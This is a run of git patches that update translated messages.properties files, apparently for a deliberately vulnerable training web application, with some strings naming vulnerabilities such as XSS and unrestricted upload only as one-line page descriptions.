size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. From 3dca2345f54f7afa778ac12c0ba5b60019fb7309 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 11 Apr 2018 17:11:32 +0900 Subject: [PATCH 039/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index 5b6babb..7176a05 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -55,8 +55,8 @@ function.description.thread.leak=Thread leak occurs every time you load this pag function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. From dcdbf651f1357865bc1cafab93267ab0fb799288 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 11 Apr 2018 17:11:34 +0900 Subject: [PATCH 040/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 8493efe..3364108 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -55,8 +55,8 @@ function.description.thread.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30f function.description.throwable=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001{0}\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 function.description.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 function.description.unintended.file.disclosure=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u610f\u56f3\u3057\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u516c\u958b\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.description.unrestricted.ext.upload=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u306e\u62e1\u5f35\u5b50\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 -function.description.unrestricted.size.upload=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u306e\u30b5\u30a4\u30ba\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u89aa\u5207\u904e\u304e\u308b\u305f\u3081\u3001ID\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u63a8\u6e2c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3067\u3059\u3002 function.description.xee=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXEE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.xss=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXSS\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 From 5e2f2e952d5b2eefafc6e1a850073b2c8004c8c7 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 11 Apr 2018 17:11:35 +0900 Subject: [PATCH 041/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index 5b6babb..7176a05 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -55,8 +55,8 @@ function.description.thread.leak=Thread leak occurs every time you load this pag function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. From d60a2a13e6be74007da9daabf0b3f9e4983b3334 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 11 Apr 2018 17:11:37 +0900 Subject: [PATCH 042/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index 5b6babb..7176a05 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -55,8 +55,8 @@ function.description.thread.leak=Thread leak occurs every time you load this pag function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. From 15caf233a8648e1372ef4f8b7ce856615c196829 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 11 Apr 2018 17:11:38 +0900 Subject: [PATCH 043/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index 5b6babb..7176a05 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -55,8 +55,8 @@ function.description.thread.leak=Thread leak occurs every time you load this pag function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. From 857b4adad2d018cfa380925be73272bba5aafab7 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 23 Apr 2018 12:40:17 +0900 Subject: [PATCH 044/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index 7176a05..a9be1f0 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -205,6 +205,7 @@ msg.mail.format.is.invalid=The mail address is an invalid format. msg.mail.is.empty=Please enter subject and content. msg.match.regular.expression=The input string matches the regular expression. msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.need.admin.privilege=You need admin privileges to go ahead from here. Please enter your user ID and password. msg.not.image.file=The chosen file is not an image file. msg.not.match.regular.expression=The input string does not match the regular expression. msg.not.xml.file=The chosen file is not an XML file. From 9cb4b9bd1ccc6037f3238ea5ef02d85bb6eb8c05 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 23 Apr 2018 12:40:19 +0900 Subject: [PATCH 045/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index 7176a05..a9be1f0 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -205,6 +205,7 @@ msg.mail.format.is.invalid=The mail address is an invalid format. msg.mail.is.empty=Please enter subject and content. msg.match.regular.expression=The input string matches the regular expression. msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.need.admin.privilege=You need admin privileges to go ahead from here. Please enter your user ID and password. msg.not.image.file=The chosen file is not an image file. msg.not.match.regular.expression=The input string does not match the regular expression. msg.not.xml.file=The chosen file is not an XML file. From 9ded36722881544e8035f92430d1482ccb824c06 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 23 Apr 2018 12:40:20 +0900 Subject: [PATCH 046/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index 7176a05..a9be1f0 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -205,6 +205,7 @@ msg.mail.format.is.invalid=The mail address is an invalid format. msg.mail.is.empty=Please enter subject and content. msg.match.regular.expression=The input string matches the regular expression. msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.need.admin.privilege=You need admin privileges to go ahead from here. Please enter your user ID and password. msg.not.image.file=The chosen file is not an image file. msg.not.match.regular.expression=The input string does not match the regular expression. msg.not.xml.file=The chosen file is not an XML file. From eb295d1fe3c460ef622ce67b428f93cc48338f8c Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 23 Apr 2018 12:40:22 +0900 Subject: [PATCH 047/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index 7176a05..a9be1f0 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -205,6 +205,7 @@ msg.mail.format.is.invalid=The mail address is an invalid format. msg.mail.is.empty=Please enter subject and content. msg.match.regular.expression=The input string matches the regular expression. msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.need.admin.privilege=You need admin privileges to go ahead from here. Please enter your user ID and password. msg.not.image.file=The chosen file is not an image file. msg.not.match.regular.expression=The input string does not match the regular expression. msg.not.xml.file=The chosen file is not an XML file. From 7c680e54269e924f4d1bf384b7d29c3d666fc8f2 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 23 Apr 2018 12:40:23 +0900 Subject: [PATCH 048/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 3364108..d4a2272 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -205,6 +205,7 @@ msg.mail.format.is.invalid=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306e\u5f6 msg.mail.is.empty=\u4ef6\u540d\u3068\u672c\u6587\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.match.regular.expression=\u5165\u529b\u6587\u5b57\u5217\u306f\u6b63\u898f\u8868\u73fe\u306b\u4e00\u81f4\u3057\u307e\u3057\u305f\u3002 msg.max.file.size.exceed=\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u304c\u8a31\u5bb9\u9650\u5ea6\u3092\u8d85\u3048\u3066\u3044\u307e\u3059\u3002 +msg.need.admin.privilege=You need admin privileges to go ahead from here. Please enter your user ID and password. msg.not.image.file=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002 msg.not.match.regular.expression=\u5165\u529b\u6587\u5b57\u5217\u306f\u6b63\u898f\u8868\u73fe\u306b\u4e00\u81f4\u3057\u307e\u305b\u3093\u3002 msg.not.xml.file=XML\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002 From 58fdf9729e8a1e76ff3e6af2b3b2b736bbb0593c Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 23 Apr 2018 12:40:25 +0900 Subject: [PATCH 049/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index 7176a05..a9be1f0 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -205,6 +205,7 @@ msg.mail.format.is.invalid=The mail address is an invalid format. msg.mail.is.empty=Please enter subject and content. msg.match.regular.expression=The input string matches the regular expression. msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.need.admin.privilege=You need admin privileges to go ahead from here. Please enter your user ID and password. msg.not.image.file=The chosen file is not an image file. msg.not.match.regular.expression=The input string does not match the regular expression. msg.not.xml.file=The chosen file is not an XML file. From 1c8c092c041a0c1d442f758c1424f93d6855c22b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 23 Apr 2018 12:40:26 +0900 Subject: [PATCH 050/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index 7176a05..a9be1f0 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -205,6 +205,7 @@ msg.mail.format.is.invalid=The mail address is an invalid format. msg.mail.is.empty=Please enter subject and content. msg.match.regular.expression=The input string matches the regular expression. msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.need.admin.privilege=You need admin privileges to go ahead from here. Please enter your user ID and password. msg.not.image.file=The chosen file is not an image file. msg.not.match.regular.expression=The input string does not match the regular expression. msg.not.xml.file=The chosen file is not an XML file. From 3d8b53d297173cc230a2a4ee9139cca49fe9cf04 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 23 Apr 2018 12:40:28 +0900 Subject: [PATCH 051/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index 7176a05..a9be1f0 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -205,6 +205,7 @@ msg.mail.format.is.invalid=The mail address is an invalid format. msg.mail.is.empty=Please enter subject and content. msg.match.regular.expression=The input string matches the regular expression. msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.need.admin.privilege=You need admin privileges to go ahead from here. Please enter your user ID and password. msg.not.image.file=The chosen file is not an image file. msg.not.match.regular.expression=The input string does not match the regular expression. msg.not.xml.file=The chosen file is not an XML file. From d424263d5d8be6556067ea388508bf6f39160d90 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 7 May 2018 07:30:43 +0200 Subject: [PATCH 052/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index a9be1f0..a77a369 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -166,7 +166,7 @@ label.version=Version label.your.mail=Your Mail Address label.your.name=Your Name -msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. +msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! From 3d9196fe5ed7c3e4e923cba70febb6fbe6b6d871 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 7 May 2018 07:30:45 +0200 Subject: [PATCH 053/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index a9be1f0..a77a369 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -166,7 +166,7 @@ label.version=Version label.your.mail=Your Mail Address label.your.name=Your Name -msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. +msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! From c3eff65459655d4c49dfe9cdba70779caf399edb Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 7 May 2018 07:30:46 +0200 Subject: [PATCH 054/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index a9be1f0..a77a369 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -166,7 +166,7 @@ label.version=Version label.your.mail=Your Mail Address label.your.name=Your Name -msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. +msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! From 7a4931582db67d4bf7ddd16dc2505e04769d9a40 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 7 May 2018 07:30:48 +0200 Subject: [PATCH 055/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index a9be1f0..a77a369 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -166,7 +166,7 @@ label.version=Version label.your.mail=Your Mail Address label.your.name=Your Name -msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. +msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! From ce7237c2707ad9d510ac595f0ecac3ae16343b09 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 7 May 2018 07:30:50 +0200 Subject: [PATCH 056/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index d4a2272..721d367 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -166,7 +166,7 @@ label.version=\u30d0\u30fc\u30b8\u30e7\u30f3 label.your.mail=\u3042\u306a\u305f\u306e\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9 label.your.name=\u3042\u306a\u305f\u306e\u540d\u524d -msg.account.locked=\u30ed\u30b0\u30a4\u30f3\u9023\u7d9a\u5931\u6557\u56de\u6570\u304c10\u56de\u3092\u8d85\u3048\u305f\u305f\u3081\u3001\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u30ed\u30c3\u30af\u3055\u308c\u3066\u3044\u307e\u3059\u3002 +msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. msg.add.users.by.xml=\u6b21\u306e\u5f62\u5f0f\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u4e00\u62ec\u3067\u767b\u9332\u3067\u304d\u307e\u3059\u3002 msg.admin.page.top=\u7ba1\u7406\u8005\u30da\u30fc\u30b8\u3078\u3088\u3046\u3053\u305d\uff01\uff01 msg.answer.is.correct=\u6b63\u89e3\u3067\u3059\u3002 From 79d15b0ced2c34be53caf0c0cd40a2d794134047 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 7 May 2018 07:30:51 +0200 Subject: [PATCH 057/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index a9be1f0..a77a369 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -166,7 +166,7 @@ label.version=Version label.your.mail=Your Mail Address label.your.name=Your Name -msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. +msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! From 6152573a3f43cc8de1f4cf933be07879522a5f41 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 7 May 2018 07:30:53 +0200 Subject: [PATCH 058/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index a9be1f0..a77a369 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -166,7 +166,7 @@ label.version=Version label.your.mail=Your Mail Address label.your.name=Your Name -msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. +msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! From 8ffda86a89d6cf4697d3c59f84a2d07b9916b636 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 7 May 2018 07:30:54 +0200 Subject: [PATCH 059/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index a9be1f0..a77a369 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -166,7 +166,7 @@ label.version=Version label.your.mail=Your Mail Address label.your.name=Your Name -msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. +msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! From d29ece1363dd3b8ad7b5e458a0406d0523604a62 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 22 May 2018 17:41:37 +0900 Subject: [PATCH 060/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index a77a369..af3caba 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -259,7 +259,6 @@ msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. -msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. From dd051f5b01c489ee7c7e639029a17d804b2cfdd6 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 22 May 2018 17:41:39 +0900 Subject: [PATCH 061/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index a77a369..af3caba 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -259,7 +259,6 @@ msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. -msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. From 8d57a9d0b7c0cb9abb0a73704a27efc4c649bb6f Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 22 May 2018 17:41:41 +0900 Subject: [PATCH 062/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index a77a369..af3caba 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -259,7 +259,6 @@ msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. -msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. From 74c6b4bd9fa9145045354637b66bad84e06c0bcb Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 22 May 2018 17:41:43 +0900 Subject: [PATCH 063/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index a77a369..af3caba 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -259,7 +259,6 @@ msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. -msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. From 39668d96ed6249970c8dd7938ff6d4b3cb898f33 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 22 May 2018 17:41:44 +0900 Subject: [PATCH 064/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 721d367..25be4a9 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -259,7 +259,6 @@ msg.reverse.color.complete=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53c msg.reverse.color.fail=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 msg.select.upload.file=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.sent.mail=\u30e1\u30fc\u30eb\u304c\u6b63\u5e38\u306b\u9001\u4fe1\u3055\u308c\u307e\u3057\u305f\u3002 -msg.smtp.server.not.setup=\u30e1\u30fc\u30eb\u30d7\u30ed\u30d1\u30c6\u30a3\u304capplication.properties\u306b\u6b63\u3057\u304f\u8a2d\u5b9a\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002 msg.unknown.exception.occur=\u4f55\u3089\u304b\u306e\u4f8b\u5916\u304c\u767a\u751f\u3057\u307e\u3057\u305f \: {0} msg.update.records={0}\u4ef6\u66f4\u65b0\u3057\u307e\u3057\u305f\u3002 msg.update.users=\u30e6\u30fc\u30b6\u30fc\u60c5\u5831\u3092\u4e00\u62ec\u3067\u66f4\u65b0\u3057\u307e\u3059\u3002 From ef92310079dab0ab55a81ebc1f6d2e055e7473af Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 22 May 2018 17:41:46 +0900 Subject: [PATCH 065/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 1 - 1 file changed, 1 deletion(-) diff --git 